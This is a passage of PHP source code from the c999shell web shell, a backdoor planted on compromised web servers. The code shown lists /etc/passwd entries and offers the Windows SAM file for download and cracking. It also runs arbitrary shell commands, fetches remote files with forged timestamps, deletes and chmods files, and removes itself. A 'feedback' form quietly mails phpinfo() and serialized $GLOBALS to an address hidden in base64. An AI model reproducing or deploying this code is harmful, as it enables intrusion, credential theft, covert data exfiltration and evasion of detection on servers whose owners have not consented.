  1499.    echo "<b>*nix /etc/passwd:</b><br>";
  1500.    if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;}
  1501.    if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;}
  1502.    echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>";
  1503.    $i = $nixpwd_s;
  1504.    while ($i < $nixpwd_e)
  1505.    {
  1506.     $uid = posix_getpwuid($i);
  1507.     if ($uid)
  1508.     {
  1509.      $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>";
  1510.      echo join(":",$uid)."<br>";
  1511.     }
  1512.     $i++;
  1513.    }
  1514.   }
  1515.   else {echo "<br><a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";}
  1516.  }
  1517.  else
  1518.  {
  1519.   $v = $_SERVER["WINDIR"]."\repair\sam";
  1520.   if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";}
  1521.   else {echo "<b><font color=green>You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ©.</font></b><br>";}
  1522.  }
  1523.  if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";}
  1524.  if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";}
  1525.  if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/usr/local/apache/conf")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
  1526.  if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
  1527.  if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=syslog.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";}
  1528.  if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=motd&d=".urlencode("/etc")."&ft=txt\"><u><b>Message Of The Day</b></u></a></font></b><br>";}
  1529.  if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=hosts&d=".urlencode("/etc")."&ft=txt\"><u><b>Hosts</b></u></a></font></b><br>";}
  1530.  function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." - </b>";} echo $name.nl2br($value)."<br>";}}
  1531.  displaysecinfo("OS Version?",myshellexec("cat /proc/version"));
  1532.  displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version"));
  1533.  displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net"));
  1534.  displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise"));
  1535.  displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo"));
  1536.  displaysecinfo("RAM",myshellexec("free -m"));
  1537.  displaysecinfo("HDD space",myshellexec("df -h"));
  1538.  displaysecinfo("List of Attributes",myshellexec("lsattr -a"));
  1539.  displaysecinfo("Mount options ",myshellexec("cat /etc/fstab"));
  1540.  displaysecinfo("Is cURL installed?",myshellexec("which curl"));
  1541.  displaysecinfo("Is lynx installed?",myshellexec("which lynx"));
  1542.  displaysecinfo("Is links installed?",myshellexec("which links"));
  1543.  displaysecinfo("Is fetch installed?",myshellexec("which fetch"));
  1544.  displaysecinfo("Is GET installed?",myshellexec("which GET"));
  1545.  displaysecinfo("Is perl installed?",myshellexec("which perl"));
  1546.  displaysecinfo("Where is apache",myshellexec("whereis apache"));
  1547.  displaysecinfo("Where is perl?",myshellexec("whereis perl"));
  1548.  displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf"));
  1549.  displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf"));
  1550.  displaysecinfo("locate my.conf",myshellexec("locate my.conf"));
  1551.  displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf"));
  1552. }
  1553. if ($act == "mkfile")
  1554. {
  1555.  if ($mkfile != $d)
  1556.  {
  1557.   if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";}
  1558.   elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";}
  1559.   else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);}
  1560.  }
  1561.  else {$act = $dspact = "ls";}
  1562. }
  1563. if ($act == "encoder")
  1564. {
  1565.  echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><center><b>Encoder:</b></center><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><center><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br></center><b>Hashes</b>:<br><center>";
  1566.  foreach(array("md5","crypt","sha1","crc32") as $v)
  1567.  {
  1568.   echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>";
  1569.  }
  1570.  echo "</center><b>Url:</b><center><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly>
  1571. <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly>
  1572. <br></center><b>Base64:</b><center>base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></center>";
  1573.  echo "<center>base64_decode - ";
  1574.  if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";}
  1575.  else
  1576.  {
  1577.   $debase64 = base64_decode($encoder_input);
  1578.   $debase64 = str_replace("\0","[0]",$debase64);
  1579.   $a = explode("\r\n",$debase64);
  1580.   $rows = count($a);
  1581.   $debase64 = htmlspecialchars($debase64);
  1582.   if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";}
  1583.   else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";}
  1584.   echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b>^</b></a>";
  1585.  }
  1586.  echo "</center><br><b>Base convertations</b>:<center>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"";
  1587.  $c = strlen($encoder_input);
  1588.  for($i=0;$i<$c;$i++)
  1589.  {
  1590.   $hex = dechex(ord($encoder_input[$i]));
  1591.   if ($encoder_input[$i] == "&") {echo $encoder_input[$i];}
  1592.   elseif ($encoder_input[$i] != "\\") {echo "%".$hex;}
  1593.  }
  1594.  echo "\" readonly><br></center></form>";
  1595. }
  1596. if ($act == "fsbuff")
  1597. {
  1598.  $arr_copy = $sess_data["copy"];
  1599.  $arr_cut = $sess_data["cut"];
  1600.  $arr = array_merge($arr_copy,$arr_cut);
  1601.  if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";}
  1602.  else {echo "<b>File-System buffer</b><br><br>"; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";}
  1603. }
  1604. if ($act == "selfremove")
  1605. {
  1606.  if (($submit == $rndcode) and ($submit != ""))
  1607.  {
  1608.   if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c999shell v.".$shver."!"; c999shexit(); }
  1609.   else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
  1610.  }
  1611.  else
  1612.  {
  1613.   if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";}
  1614.   $rnd = rand(0,9).rand(0,9).rand(0,9);
  1615.   echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>";
  1616.  }
  1617. }
  1618. if ($act == "update") {$ret = c999sh_getupdate(!!$confirmupdate); echo "<b>".$ret."</b>"; if (stristr($ret,"new version")) {echo "<br><br><input type=button onclick=\"location.href='".$surl."act=update&confirmupdate=1';\" value=\"Update now\">";}}
  1619. if ($act == "feedback")
  1620. {
  1621.  $suppmail = base64_decode("Yzk5c2hlbGxAY2N0ZWFtLnJ1");
  1622.  if (!empty($submit))
  1623.  {
  1624.   $ticket = substr(md5(microtime()+rand(1,1000)),0,6);
  1625.   $body = "c999shell v.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR;
  1626.   if (!empty($fdbk_ref))
  1627.   {
  1628.    $tmp = @ob_get_contents();
  1629.    ob_clean();
  1630.    phpinfo();
  1631.    $phpinfo = base64_encode(ob_get_contents());
  1632.    ob_clean();
  1633.    echo $tmp;
  1634.    $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n";
  1635.   }
  1636.   mail($suppmail,"c999shell v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail);
  1637.   echo "<center><b>Thanks for your feedback! Your ticket ID: ".$ticket.".</b></center>";
  1638.  }
  1639.  else {echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=feedback><b>Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):<br><br>Your name: <input type=\"text\" name=\"fdbk_name\" value=\"".htmlspecialchars($fdbk_name)."\"><br><br>Your e-mail: <input type=\"text\" name=\"fdbk_email\" value=\"".htmlspecialchars($fdbk_email)."\"><br><br>Message:<br><textarea name=\"fdbk_body\" cols=80 rows=10>".htmlspecialchars($fdbk_body)."</textarea><input type=\"hidden\" name=\"fdbk_ref\" value=\"".urlencode($HTTP_REFERER)."\"><br><br>Attach server-info * <input type=\"checkbox\" name=\"fdbk_servinf\" value=\"1\" checked><br><br>There are no checking in the form.<br><br>* - strongly recommended, if you report bug, because we need it for bug-fix.<br><br>We understand languages: English, Russian.<br><br><input type=\"submit\" name=\"submit\" value=\"Send\"></form>";}
  1640. }
  1641. if ($act == "search")
  1642. {
  1643.  echo "<b>Search in file-system:</b><br>";
  1644.  if (empty($search_in)) {$search_in = $d;}
  1645.  if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
  1646.  if (empty($search_text_wwo)) {$search_text_regexp = 0;}
  1647.  if (!empty($submit))
  1648.  {
  1649.   $found = array();
  1650.   $found_d = 0;
  1651.   $found_f = 0;
  1652.   $search_i_f = 0;
  1653.   $search_i_d = 0;
  1654.   $a = array
  1655.   (
  1656.    "name"=>$search_name, "name_regexp"=>$search_name_regexp,
  1657.    "text"=>$search_text, "text_regexp"=>$search_text_regxp,
  1658.    "text_wwo"=>$search_text_wwo,
  1659.    "text_cs"=>$search_text_cs,
  1660.    "text_not"=>$search_text_not
  1661.   );
  1662.   $searchtime = getmicrotime();
  1663.   $in = array_unique(explode(";",$search_in));
  1664.   foreach($in as $v) {c999fsearch($v);}
  1665.   $searchtime = round(getmicrotime()-$searchtime,4);
  1666.   if (count($found) == 0) {echo "<b>No files found!</b>";}
  1667.   else
  1668.   {
  1669.    $ls_arr = $found;
  1670.    $disp_fullpath = TRUE;
  1671.    $act = "ls";
  1672.   }
  1673.  }
  1674.  echo "<form method=POST>
  1675. <input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\">
  1676. <b>Search for (file/folder name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp
  1677. <br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\">
  1678. <br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea>
  1679. <br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp
  1680. &nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only
  1681. &nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive
  1682. &nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text
  1683. <br><br><input type=submit name=submit value=\"Search\"></form>";
  1684.  if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b><br><br>";}
  1685. }
  1686. if ($act == "chmod")
  1687. {
  1688.  $mode = fileperms($d.$f);
  1689.  if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";}
  1690.  else
  1691.  {
  1692.   $form = TRUE;
  1693.   if ($chmod_submit)
  1694.   {
  1695.    $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
  1696.    if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";}
  1697.    else {$err = "Can't chmod to ".$octet.".";}
  1698.   }
  1699.   if ($form)
  1700.   {
  1701.    $perms = parse_perms($mode);
  1702.    echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>";
  1703.   }
  1704.  }
  1705. }
  1706. if ($act == "upload")
  1707. {
  1708.  $uploadmess = "";
  1709.  $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath);
  1710.  if (empty($uploadpath)) {$uploadpath = $d;}
  1711.  elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";}
  1712.  if (!empty($submit))
  1713.  {
  1714.   global $HTTP_POST_FILES;
  1715.   $uploadfile = $HTTP_POST_FILES["uploadfile"];
  1716.   if (!empty($uploadfile["tmp_name"]))
  1717.   {
  1718.    if (empty($uploadfilename)) {$destin = $uploadfile["name"];}
  1719.    else {$destin = $userfilename;}
  1720.    if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!<br>";}
  1721.   }
  1722.   elseif (!empty($uploadurl))
  1723.   {
  1724.    if (!empty($uploadfilename)) {$destin = $uploadfilename;}
  1725.    else
  1726.    {
  1727.     $destin = explode("/",$destin);
  1728.     $destin = $destin[count($destin)-1];
  1729.     if (empty($destin))
  1730.     {
  1731.      $i = 0;
  1732.      $b = "";
  1733.      while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}}
  1734.    }
  1735.    if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";}
  1736.    else
  1737.    {
  1738.     $st = getmicrotime();
  1739.     $content = @file_get_contents($uploadurl);
  1740.     $dt = round(getmicrotime()-$st,4);
  1741.     if (!$content) {$uploadmess .=  "Can't download file!<br>";}
  1742.     else
  1743.     {
  1744.      if ($filestealth) {$stat = stat($uploadpath.$destin);}
  1745.      $fp = fopen($uploadpath.$destin,"w");
  1746.      if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";}
  1747.      else
  1748.      {
  1749.       fwrite($fp,$content,strlen($content));
  1750.       fclose($fp);
  1751.       if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
  1752.      }
  1753.     }
  1754.    }
  1755.   }
  1756.  }
  1757.  if ($miniform)
  1758.  {
  1759.   echo "<b>".$uploadmess."</b>";
  1760.   $act = "ls";
  1761.  }
  1762.  else
  1763.  {
  1764.   echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=POST>
  1765. Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br>
  1766. Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br>
  1767. Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br>
  1768. File-name (auto-fill): <input name=uploadfilename size=25><br><br>
  1769. <input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br>
  1770. <input type=submit name=submit value=\"Upload\">
  1771. </form>";
  1772.  }
  1773. }
  1774. if ($act == "delete")
  1775. {
  1776.  $delerr = "";
  1777.  foreach ($actbox as $v)
  1778.  {
  1779.   $result = FALSE;
  1780.   $result = fs_rmobj($v);
  1781.   if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";}
  1782.  }
  1783.  if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;}
  1784.  $act = "ls";
  1785. }
  1786. if (!$usefsbuff)
  1787. {
  1788.  if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.</center>";}
  1789. }
  1790. else
  1791. {
  1792.  if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c999_sess_put($sess_data); $act = "ls"; }
  1793.  elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c999_sess_put($sess_data); $act = "ls";}
  1794.  elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c999_sess_put($sess_data); $act = "ls";}
  1795.  if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c999_sess_put($sess_data);}
  1796.  elseif ($actpastebuff)
  1797.  {
  1798.   $psterr = "";
  1799.   foreach($sess_data["copy"] as $k=>$v)
  1800.   {
  1801.    $to = $d.basename($v);
  1802.    if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
  1803.    if ($copy_unset) {unset($sess_data["copy"][$k]);}
  1804.   }
  1805.   foreach($sess_data["cut"] as $k=>$v)
  1806.   {
  1807.    $to = $d.basename($v);
  1808.    if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
  1809.    unset($sess_data["cut"][$k]);
  1810.   }
  1811.   c999_sess_put($sess_data);
  1812.   if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
  1813.   $act = "ls";
  1814.  }
  1815.  elseif ($actarcbuff)
  1816.  {
  1817.   $arcerr = "";
  1818.   if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
  1819.   else {$ext = ".tar.gz";}
  1820.   if ($ext == ".tar.gz") {$cmdline = "tar cfzv";}
  1821.   $cmdline .= " ".$actarcbuff_path;
  1822.   $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
  1823.   foreach($objects as $v)
  1824.   {
  1825.    $v = str_replace("\\",DIRECTORY_SEPARATOR,$v);
  1826.    if (substr($v,0,strlen($d)) == $d) {$v = basename($v);}
  1827.    if (is_dir($v))
  1828.    {
  1829.     if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;}
  1830.     $v .= "*";
  1831.    }
  1832.    $cmdline .= " ".$v;
  1833.   }
  1834.   $tmp = realpath(".");
  1835.   chdir($d);
  1836.   $ret = myshellexec($cmdline);
  1837.   chdir($tmp);
  1838.   if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";}
  1839.   $ret = str_replace("\r\n","\n",$ret);
  1840.   $ret = explode("\n",$ret);
  1841.   if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
  1842.   foreach($sess_data["cut"] as $k=>$v)
  1843.   {
  1844.    if (in_array($v,$ret)) {fs_rmobj($v);}
  1845.    unset($sess_data["cut"][$k]);
  1846.   }
  1847.   c999_sess_put($sess_data);
  1848.   if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;}
  1849.   $act = "ls";
  1850.  }
  1851.  elseif ($actpastebuff)
  1852.  {
  1853.   $psterr = "";
  1854.   foreach($sess_data["copy"] as $k=>$v)
  1855.   {
  1856.    $to = $d.basename($v);
  1857.    if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
  1858.    if ($copy_unset) {unset($sess_data["copy"][$k]);}
  1859.   }
  1860.   foreach($sess_data["cut"] as $k=>$v)
  1861.   {
  1862.    $to = $d.basename($v);
  1863.    if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
  1864.    unset($sess_data["cut"][$k]);
  1865.   }
  1866.   c999_sess_put($sess_data);
  1867.   if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
  1868.   $act = "ls";
  1869.  }
  1870. }
  1871. if ($act == "cmd")
  1872. {
  1873. if (trim($cmd) == "ps -aux") {$act = "processes";}
  1874. elseif (trim($cmd) == "tasklist") {$act = "processes";}
  1875. else
  1876. {
  1877.  @chdir($chdir);
  1878.  if (!empty($submit))
  1879.  {
  1880.   echo "<b>Result of execution this command</b>:<br>";
  1881.   $olddir = realpath(".");
  1882.   @chdir($d);
  1883.   $ret = myshellexec($cmd);
  1884.   $ret = convert_cyr_string($ret,"d","w");
  1885.   if ($cmd_txt)
  1886.   {
  1887.    $rows = count(explode("\r\n",$ret))+1;
  1888.    if ($rows < 10) {$rows = 10;}
  1889.    echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
  1890.   }
  1891.   else {echo $ret."<br>";}
  1892.   @chdir($olddir);
  1893.  }
  1894.  else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}}
  1895.  echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>";
  1896. }
  1897. }
  1898. if ($act == "ls")
  1899. {
  1900.  if (count($ls_arr) > 0) {$list = $ls_arr;}
  1901.  else
  1902.  {
  1903.   $list = array();
  1904.   if ($h = @opendir($d))
  1905.   {
  1906.    while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;}
  1907.    closedir($h);
  1908.   }
  1909.   else {}
  1910.  }
  1911.  if (count($list) == 0) {echo "<center><b>Can't open folder (".htmlspecialchars($d).")!</b></center>";}
  1912.  else
  1913.  {
  1914.   //Building array
  1915.   $objects = array();
  1916.   $vd = "f"; //Viewing mode
  1917.  
  1918.   if ($vd == "f")
  1919.   {
  1920.    $objects["head"] = array();
  1921.    $objects["folders"] = array();
  1922.    $objects["links"] = array();
  1923.    $objects["files"] = array();
  1924.    foreach ($list as $v)
  1925.    {
  1926.     $o = basename($v);
  1927.     $row = array();
  1928.     if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";}
  1929.     elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";}
  1930.     elseif (is_dir($v))
  1931.     {
  1932.      if (is_link($v)) {$type = "LINK";}
  1933.      else {$type = "DIR";}
  1934.      $row[] = $v;
  1935.      $row[] = $type;
  1936.     }
  1937.     elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);}
  1938.     $row[] = filemtime($v);
  1939.     if (!$win)
  1940.     {
  1941.      $ow = posix_getpwuid(fileowner($v));
  1942.      $gr = posix_getgrgid(filegroup($v));
  1943.      $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v));
  1944.     }
  1945.     $row[] = fileperms($v);
  1946.     if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}
  1947.     elseif (is_link($v)) {$objects["links"][] = $row;}
  1948.     elseif (is_dir($v)) {$objects["folders"][] = $row;}
  1949.     elseif (is_file($v)) {$objects["files"][] = $row;}
  1950.     $i++;
  1951.    }
  1952.    $row = array();
  1953.    $row[] = "<b>Name</b>";
  1954.    $row[] = "<b>Size</b>";
  1955.    $row[] = "<b>Modify</b>";
  1956.    if (!$win)
  1957.   {$row[] = "<b>Owner/Group</b>";}
  1958.    $row[] = "<b>Perms</b>";
  1959.    $row[] = "<b>Action</b>";
  1960.    $parsesort = parsesort($sort);
  1961.    $sort = $parsesort[0].$parsesort[1];
  1962.    $k = $parsesort[0];
  1963.    if ($parsesort[1] != "a") {$parsesort[1] = "d";}
  1964.    $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">";
  1965.    $y .= "<img src=\"".$surl."act=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" height=\"9\" width=\"14\" alt=\"".($parsesort[1] == "a"?"Asc.":"Desc")."\" border=\"0\"></a>";
  1966.    $row[$k] .= $y;
  1967.    for($i=0;$i<count($row)-1;$i++)
  1968.    {
  1969.     if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";}
  1970.    }
  1971.    $v = $parsesort[0];
  1972.    usort($objects["folders"], "tabsort");
  1973.    usort($objects["links"], "tabsort");
  1974.    usort($objects["files"], "tabsort");
  1975.    if ($parsesort[1] == "d")
  1976.    {
  1977.     $objects["folders"] = array_reverse($objects["folders"]);
  1978.     $objects["files"] = array_reverse($objects["files"]);
  1979.    }
  1980.    $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]);
  1981.    $tab = array();
  1982.    $tab["cols"] = array($row);
  1983.    $tab["head"] = array();
